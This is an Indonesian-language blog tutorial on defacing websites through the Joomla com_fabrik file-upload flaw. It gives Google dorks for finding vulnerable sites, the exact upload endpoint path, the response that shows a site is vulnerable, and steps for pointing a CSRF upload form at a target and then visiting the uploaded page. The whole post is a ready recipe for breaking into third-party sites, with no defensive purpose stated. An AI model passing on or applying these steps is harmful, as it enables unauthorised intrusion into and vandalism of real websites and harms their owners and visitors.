Deface poc Com_Fabrik With Csrf

Com_Fabrik With Csrf    
20181025-153526

    :v ketemu lagi, kali ini tutorial deface poc Com_Fabrik With Csrf


Senjata :
1. Dork :
inurl:index.php?option=com_fabrik              
inurl:index.php/component/fabrik/ site:.dk              
inurl:index.php?option=com_fabrik&view= site:              
inurl:importcsv.php site:              
inurl:viewTable?cid= site:com (Jangan lupa kembangin)

-Exploitnya : /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
2.CSRF com_fabrik klik sini
3. Kopi Item + Rokok. 
4. Kuota & Kesabaran :)

Oke, Langsung aja mank

1. Dorking dulu ke Google
Screenshot-2018-10-26-08-24-52-069-com-android-browser

2.pilih salah satu target, dan masukan ExploitnyaScreenshot-2018-10-26-08-28-31-726-com-android-browser
Screenshot-2018-10-26-08-27-55-380-com-android-browser
Jika vuln akan muncul tulisan {"filepath":null,"uri":null} kalau gk ada kemungkinana itu web kagak vuln, cari yg lain :v
4. Download csrf yg di atas 
Screenshot-2018-10-26-13-31-49-994-com-lonelycatgames-Xplore
Yang ada warnanya itu ganti dengan site target yg vuln :v
Hasil:
20181026-133832


#cara ngaksesnya http://target.nya/namasclu.html

Ok sekian n terimakasi, moga bermanfaat:v


mau copas sertain sumber

Post a Comment

Previous Post Next Post